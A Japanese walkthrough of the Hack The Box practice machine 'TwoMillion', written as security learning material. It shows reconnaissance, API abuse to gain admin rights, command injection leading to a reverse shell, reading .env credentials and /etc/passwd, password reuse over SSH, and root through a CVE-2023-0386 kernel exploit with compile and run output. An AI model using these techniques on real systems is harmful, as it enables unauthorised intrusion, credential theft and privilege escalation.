初めに
どうも、クソ雑魚のなんちゃてエンジニアです。
本記事は Hack The Box(以下リンク参照) の「TwoMillion」にチャレンジした際の WriteUp になります。
※以前までのツールの使い方など詳細を書いたものではないのでご了承ください。
※悪用するのはやめてください。あくまで社会への貢献のためにこれらの技術を使用してください。法に触れるので。
Discovery
ポートスキャン
今回はRustScanで高速スキャンしてみた。
┌──(root㉿kali)-[~]
└─# rustscan -a 10.10.11.221 --top --ulimit 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.221:22
Open 10.10.11.221:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.93 ( https://nmap.org ) at 2023-06-08 01:56 EDT
Initiating Ping Scan at 01:56
Scanning 10.10.11.221 [4 ports]
Completed Ping Scan at 01:56, 0.23s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 01:56
Completed Parallel DNS resolution of 1 host. at 01:56, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 01:56
Scanning 10.10.11.221 [2 ports]
Discovered open port 80/tcp on 10.10.11.221
Discovered open port 22/tcp on 10.10.11.221
Completed SYN Stealth Scan at 01:56, 0.22s elapsed (2 total ports)
Nmap scan report for 10.10.11.221
Host is up, received reset ttl 63 (0.19s latency).
Scanned at 2023-06-08 01:56:28 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.58 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (128B)
ポート22、80が公開されてそう。
実際に80にアクセスしてみると、「2million.htb」にアクセスできませんと言われるのでDNSの設定を投入していく。
Collection - 1
ドメイン環境設定
今回BOX環境にDNSはないので、自身のkalilinuxで名前解決できるようにする。
/etc/hostsをいじっていく。
┌──(root💀kali)-[~/work]
└─# vim /etc/hosts
以下を投入。
10.10.11.221 2million.htb
疎通確認を行う。
┌──(root㉿kali)-[~]
└─# ping 2million.htb
PING 2million.htb (10.10.11.221) 56(84) bytes of data.
64 bytes from 2million.htb (10.10.11.221): icmp_seq=1 ttl=63 time=188 ms
64 bytes from 2million.htb (10.10.11.221): icmp_seq=2 ttl=63 time=185 ms
64 bytes from 2million.htb (10.10.11.221): icmp_seq=3 ttl=63 time=185 ms
^C
--- 2million.htb ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 2004ms
rtt min/avg/max/mdev = 184.595/185.965/187.920/1.418 ms
サイト探索
Subdomain探索
以下サイトからサブドメインのリストをダウンロード
┌──(root💀kali)-[~/work]
└─# wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/DNS/bitquark-subdomains-top100000.txt
ffufで探索。
┌──(root㉿kali)-[~/work]
└─# ffuf -w ./bitquark-subdomains-top100000.txt:FUZZ -u http://2million.htb/ -H "HOST: FUZZ.2million.htb" -fs 162 -mc all -t 150
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://2million.htb/
:: Wordlist : FUZZ: /root/work/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.2million.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: all
:: Filter : Response size: 162
________________________________________________
:: Progress: [100000/100000] :: Job [1/1] :: 772 req/sec :: Duration: [0:02:14] :: Errors: 0 ::
特段何もない。
ディレクトリ探索
dirsearchを使用して探索を実施。
┌──(root㉿kali)-[~/work]
└─# dirsearch -u http://2million.htb/
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/2million.htb/-_23-06-08_02-10-55.txt
Error Log: /root/.dirsearch/logs/errors-23-06-08_02-10-55.log
Target: http://2million.htb/
[02:10:56] Starting:
[02:10:58] 301 - 162B - /js -> http://2million.htb/js/
[02:11:11] 200 - 2KB - /404
[02:11:37] 401 - 0B - /api
[02:11:37] 401 - 0B - /api/v1
[02:11:38] 301 - 162B - /assets -> http://2million.htb/assets/
[02:11:38] 403 - 548B - /assets/
[02:11:47] 403 - 548B - /controllers/
[02:11:48] 301 - 162B - /css -> http://2million.htb/css/
[02:11:56] 301 - 162B - /fonts -> http://2million.htb/fonts/
[02:11:59] 302 - 0B - /home -> /
[02:12:00] 301 - 162B - /images -> http://2million.htb/images/
[02:12:00] 403 - 548B - /images/
[02:12:03] 403 - 548B - /js/
[02:12:06] 200 - 4KB - /login
[02:12:07] 302 - 0B - /logout -> /
[02:12:21] 200 - 4KB - /register
[02:12:36] 301 - 162B - /views -> http://2million.htb/views/
ffufでも確認しておく。
┌──(root㉿kali)-[~/work]
└─# ffuf -w ./directory-list-2.3-small.txt:FUZZ -u http://2million.htb/FUZZ -t 150 -fs 162
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.0.0-dev
________________________________________________
:: Method : GET
:: URL : http://2million.htb/FUZZ
:: Wordlist : FUZZ: /root/work/directory-list-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 150
:: Matcher : Response status: 200,204,301,302,307,401,403,405,500
:: Filter : Response size: 162
________________________________________________
[Status: 200, Size: 3704, Words: 1365, Lines: 81, Duration: 229ms]
* FUZZ: login
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 258ms]
* FUZZ: home
[Status: 200, Size: 4527, Words: 1512, Lines: 95, Duration: 285ms]
* FUZZ: register
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 197ms]
* FUZZ: #
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 206ms]
* FUZZ: # directory-list-2.3-small.txt
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 214ms]
* FUZZ: # or send a letter to Creative Commons, 171 Second Street,
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 258ms]
* FUZZ: #
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 268ms]
* FUZZ: # on at least 3 different hosts
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 268ms]
* FUZZ: # Priority-ordered case-sensitive list, where entries were found
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 260ms]
* FUZZ: # Suite 300, San Francisco, California, 94105, USA.
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 273ms]
* FUZZ: # license, visit http://creativecommons.org/licenses/by-sa/3.0/
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 270ms]
* FUZZ: #
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 268ms]
* FUZZ:
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 199ms]
* FUZZ: # Copyright 2007 James Fisher
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 196ms]
* FUZZ: #
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 200ms]
* FUZZ: # Attribution-Share Alike 3.0 License. To view a copy of this
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 202ms]
* FUZZ: # This work is licensed under the Creative Commons
[Status: 401, Size: 0, Words: 1, Lines: 1, Duration: 203ms]
* FUZZ: api
[Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 206ms]
* FUZZ: logout
[Status: 200, Size: 1674, Words: 118, Lines: 46, Duration: 227ms]
* FUZZ: 404
[Status: 200, Size: 1674, Words: 118, Lines: 46, Duration: 347ms]
* FUZZ: 0404
[Status: 200, Size: 3859, Words: 1363, Lines: 97, Duration: 395ms]
* FUZZ: invite
[Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 445ms]
* FUZZ:
:: Progress: [87664/87664] :: Job [1/1] :: 339 req/sec :: Duration: [0:04:20] :: Errors: 0 ::
invite階層にアクセスしてみる。
ほう。ここにPostできるみたいなので、ペイロードを叩き込んでみる。
Initial Access - 1
sqlmap
DBにinviteコードを確認してそうな動作ぽいのでsqlmapを試してみる。
以下のリクエストを作成しておく。
req
POST /api/v1/invite/verify HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 14
Origin: http://2million.htb
Connection: close
Referer: http://2million.htb/invite
Cookie: PHPSESSID=0t5v42tcp6fbo88jss9a5pu1ru
code=1
よし!sqlmapを実行します。
┌──(root㉿kali)-[~/work]
└─# sqlmap -r req --dump --batch --level 5 --risk 3
___
__H__
___ ___[,]_____ ___ ___ {1.7.2#stable}
|_ -| . ['] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:37:57 /2023-06-08/
[02:37:57] [INFO] parsing HTTP request from 'req'
[02:37:57] [INFO] testing connection to the target URL
[02:37:57] [INFO] testing if the target URL content is stable
[02:37:58] [INFO] target URL content is stable
[02:37:58] [INFO] testing if POST parameter 'code' is dynamic
[02:37:58] [WARNING] POST parameter 'code' does not appear to be dynamic
[02:37:58] [WARNING] heuristic (basic) test shows that POST parameter 'code' might not be injectable
[02:37:58] [INFO] testing for SQL injection on POST parameter 'code'
[02:37:58] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[02:38:12] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause'
[02:38:33] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT)'
[02:38:47] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:38:57] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[02:39:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[02:39:14] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (comment)'
[02:39:18] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - comment)'
[02:39:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:39:26] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[02:39:36] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[02:39:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:39:48] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (Microsoft Access comment)'
[02:39:58] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[02:40:09] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
...省略
何もいいものが出てこない。
別のルートで試す必要がありそうだ。
Collection - 2
invite
サイト内を探っていると気になるJSファイルを発見する。inviteapi.min.jsだ。
難読化されていたので、読みやすいように以下のサイトで加工する。
記載されているPathへアクセスしてみる。
dataがROT13で暗号化されているみたいなのでデコードを以下サイトで実施する。
ほう、/api/v1/invite/generateにPOSTすればコードが手に入るみたいなので投げてみる。
かえって来た!コードがBase64でエンコードされてそうなのでデコードする。
/invite階層に上記コードを打ち込んでみる。
/registerに飛べたのでUserを作成できそうだ。testユーザーを作成してみて、ログインしてみる。
できた。
パット見何も見つからないので、再度調査が必要そう。
api
色々と探っていると、以下の階層でapiのエンドポイントリストが見つかった。
/api/v1/user/authにアクセスしてみる。
あーこのis_adminフラグでadminのエンドポイントにアクセスできるってわけですね。
admin
新たなUserを作る際にこのフラグを立てて投げてみる。
ログイン成功!is_adminフラグが入ってるか確認してみる。
ダメだった。なら/api/v1/admin/settings/updateのエンドポイントかなぁ
PUTを投げてみる。
content-typeが違うといわれるのでJSONで飛ばしてみる。
上手くレスポンスがかえってきた。is_adminフラグが立ってるみたいだ。
Initial Access - 2
admin - vpn
/api/v1/admin/vpn/generateのエンドポイントへアクセスしてみる、どうせPOSTなのでここに脆弱性があるんだろ!
content-typeが違うって言われるのでJSON形式でとばしてみる。
usernameがないといわれるので付け加える。
ここに何かペイロードを叩き込めるか試してみる。
Reverse shell
tcmdumpでpingが帰ってくるか確認してみる。
かえってきました。OS cmd Injectionが出来そう。
御用達の以下サイトを参考にReverseShellのコマンドを作成
リバースシェル確立のために受け側を用意しておく。
┌──(root💀kali)-[~/work]
└─# nc -lnvp 4444
listening on [any] 4444 ...
リバースシェルを実行!!
シェルゲットだぜ!!!
Persistence
何か情報がないか確認する。
www-data@2million:~/html$ ls -lta
ls -lta
total 56
drwxr-xr-x 5 root root 4096 Jun 8 12:20 VPN
drwxr-xr-x 10 root root 4096 Jun 8 12:20 .
drwxr-xr-x 2 root root 4096 Jun 6 10:22 views
drwxr-xr-x 2 root root 4096 Jun 6 10:22 controllers
drwxr-xr-x 3 root root 4096 Jun 6 10:22 js
drwxr-xr-x 3 root root 4096 Jun 6 10:22 ..
drwxr-xr-x 2 root root 4096 Jun 6 10:22 fonts
drwxr-xr-x 2 root root 4096 Jun 6 10:22 images
drwxr-xr-x 5 root root 4096 Jun 6 10:22 css
drwxr-xr-x 2 root root 4096 Jun 6 10:22 assets
-rw-r--r-- 1 root root 2692 Jun 2 18:57 index.php
-rw-r--r-- 1 root root 87 Jun 2 18:56 .env
-rw-r--r-- 1 root root 2787 Jun 2 16:15 Router.php
-rw-r--r-- 1 root root 1237 Jun 2 16:15 Database.php
www-data@2million:~/html$ cat .env
cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123
www-data@2million:~/html$
パスワードを見つけたので此奴でSSHできるか試してみる。どのユーザが存在するかは/etc/passwdをみて確認しておく。
www-data@2million:~/html$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false
admin:x:1000:1000::/home/admin:/bin/bash
memcache:x:115:121:Memcached,,,:/nonexistent:/bin/false
_laurel:x:998:998::/var/log/laurel:/bin/false
レッツSSH!!
上手くいきました。
Privilege Escalation
調査
sudo -l
とりあえずsudo -lで特権で使えそうなファイルやコマンドを探してみる。
admin@2million:~$ sudo -l
[sudo] password for admin:
Sorry, user admin may not run sudo on localhost.
なにもない。。。
linpeas
ということでlinpeas使います。Linemunよりこっち派。
以下のサイトからlinpeas.shをダウンロードしてくる。
┌──(root㉿kali)-[~/work]
└─# wget https://github.com/carlospolop/PEASS-ng/releases/download/20230312/linpeas.sh
実行。
admin@2million:/tmp$ chmod +x linpeas.sh
admin@2million:/tmp$ ./linpeas.sh
▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄▄▄ ▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄ ▄▄▄ ▄▄▄▄▄ ▄▄▄
▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄
▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄ ▄▄▄▄
▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄ ▄ ▄▄
▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄ ▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄
▀▀▄▄▄ ▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▄▀▀▀▀▀▀
▀▀▀▄▄▄▄▄ ▄▄▄▄▄▄▄▄▄▄ ▄▄▄▄▄▄▀▀
▀▀▀▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▀▀▀
/---------------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------------|
| Get the latest version : https://github.com/sponsors/carlospolop |
| Follow on Twitter : @hacktricks_live |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.'
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-hardening/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
...省略
╔══════════╣ Files inside others home (limit 20)
/var/www/html/assets/particlesinline.json
/var/www/html/assets/particles.json
/var/www/html/css/pe-icons/Pe-icon-7-stroke.svg
/var/www/html/css/pe-icons/Pe-icon-7-stroke.ttf
/var/www/html/css/pe-icons/Pe-icon-7-stroke.woff
/var/www/html/css/pe-icons/pe-icon-7-stroke.css
/var/www/html/css/pe-icons/Pe-icon-7-stroke.eot
/var/www/html/css/pe-icons/helper.css
/var/www/html/css/style.css
/var/www/html/css/flags/flags.png
/var/www/html/css/flags/flags.min.css
/var/www/html/css/frontpage.css
/var/www/html/css/htb-frontpage.css
/var/www/html/css/animate.css
/var/www/html/css/htb-frontend.css
/var/www/html/css/stroke-icons/style.css
/var/www/html/css/stroke-icons/stroke.woff
/var/www/html/css/stroke-icons/stroke.eot
/var/www/html/css/stroke-icons/stroke.svg
/var/www/html/css/stroke-icons/stroke.ttf
╔══════════╣ Searching installed mail applications
╔══════════╣ Mails (limit 50)
271 4 -rw-r--r-- 1 admin admin 540 Jun 2 23:20 /var/mail/admin
271 4 -rw-r--r-- 1 admin admin 540 Jun 2 23:20 /var/spool/mail/admin
...省略
お、何かmailがある!確認してみる。
admin@2million:/tmp$ cat /var/mail/admin
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2
Hey admin,
I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.
HTB Godfather
OverlayFS / FUSE???
CVE-2023-0386
OverlayFS / FUSEで検索してみると以下のサイトを発見する。
ファイルシステムの脆弱性みたいだ。
この脆弱性のPoCは以下のGituhubで確認できる。
というわけでこのPoCを使ってExploit実行してみる。
admin@2million:/tmp/taks/CVE-2023-0386$ make all
gcc fuse.c -o fuse -D_FILE_OFFSET_BITS=64 -static -pthread -lfuse -ldl
fuse.c: In function ‘read_buf_callback’:
fuse.c:106:21: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘off_t’ {aka ‘long int’} [-Wformat=]
106 | printf("offset %d\n", off);
| ~^ ~~~
| | |
| int off_t {aka long int}
| %ld
fuse.c:107:19: warning: format ‘%d’ expects argument of type ‘int’, but argument 2 has type ‘size_t’ {aka ‘long unsigned int’} [-Wformat=]
107 | printf("size %d\n", size);
| ~^ ~~~~
| | |
| int size_t {aka long unsigned int}
| %ld
fuse.c: In function ‘main’:
fuse.c:214:12: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
214 | while (read(fd, content + clen, 1) > 0)
| ^~~~
| fread
fuse.c:216:5: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
216 | close(fd);
| ^~~~~
| pclose
fuse.c:221:5: warning: implicit declaration of function ‘rmdir’ [-Wimplicit-function-declaration]
221 | rmdir(mount_path);
| ^~~~~
/usr/bin/ld: /usr/lib/gcc/x86_64-linux-gnu/11/../../../x86_64-linux-gnu/libfuse.a(fuse.o): in function `fuse_new_common':
(.text+0xaf4e): warning: Using 'dlopen' in statically linked applications requires at runtime the shared libraries from the glibc version used for linking
gcc -o exp exp.c -lcap
gcc -o gc getshell.c
admin@2million:/tmp/taks/CVE-2023-0386$ ./fuse ./ovlcap/lower ./gc
[+] len of gc: 0x3ee0
mkdir: File exists
[+] readdir
[+] getattr_callback
/file
[+] open_callback
/file
[+] read buf callback
offset 0
size 16384
path /file
[+] open_callback
/file
[+] open_callback
/file
[+] ioctl callback
path /file
cmd 0x80086601
ファイルシステムマウント後は別のターミナルでコマンドを実行する。
admin@2million:/tmp/taks/CVE-2023-0386$ ./exp
uid:1000 gid:1000
[+] mount success
total 8
drwxrwxr-x 1 root root 4096 Jun 8 13:25 .
drwxr-xr-x 6 root root 4096 Jun 8 13:24 ..
-rwsrwxrwx 1 nobody nogroup 16096 Jan 1 1970 file
[+] exploit success!
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
上手く特権昇格できました!!
まとめ
久しぶりにEasyらしいBoxをやったと思います。apiハッキングにはいい教材なのではないでしょうか??
今回もセキュリティエンジニアの皆さんの助けになればなと思います。